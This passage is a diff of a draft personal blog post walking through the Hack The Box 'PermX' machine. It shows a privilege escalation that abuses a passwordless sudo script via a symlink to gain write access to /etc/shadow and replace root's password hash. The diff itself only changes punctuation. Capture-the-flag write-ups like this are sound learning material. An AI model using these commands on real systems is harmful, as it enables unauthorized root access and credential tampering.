M4NU5/Personal_Website/content/thoughts/tech/DRAFT-hack_the_box_3_permx/index.md

     (ALL : ALL) NOPASSWD: /opt/acl.sh
 ```

 We can run **[acl.sh](http://acl.sh)** as a sudo user without a password.
 Looking at the script is assigns permissions to a given target file but does restrict the user to only be able to run it on their home directory.
-We can’t edit this file but we can abuse the security check by creating a symbolic link to root
+We can’t edit this file but we can abuse the security check by creating a symbolic link to root.
 ```bash
 mtz@permx:~$ ln -s / root # Create temp symbolic link mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow # GIB SHADOW FILE PERMS
 mtz@permx:~$ vim /etc/shadow
 ```

-Here we can pull the hashed root password and crack it… or we can just overwrite it with mtz password then we can `su root` input mtz password and BAM
+Here we can pull the hashed root password and crack it… or we can just overwrite it with mtz password then we can `su root` input mtz password and BAM!!!

 ```bash
 mtz@permx:~$ su root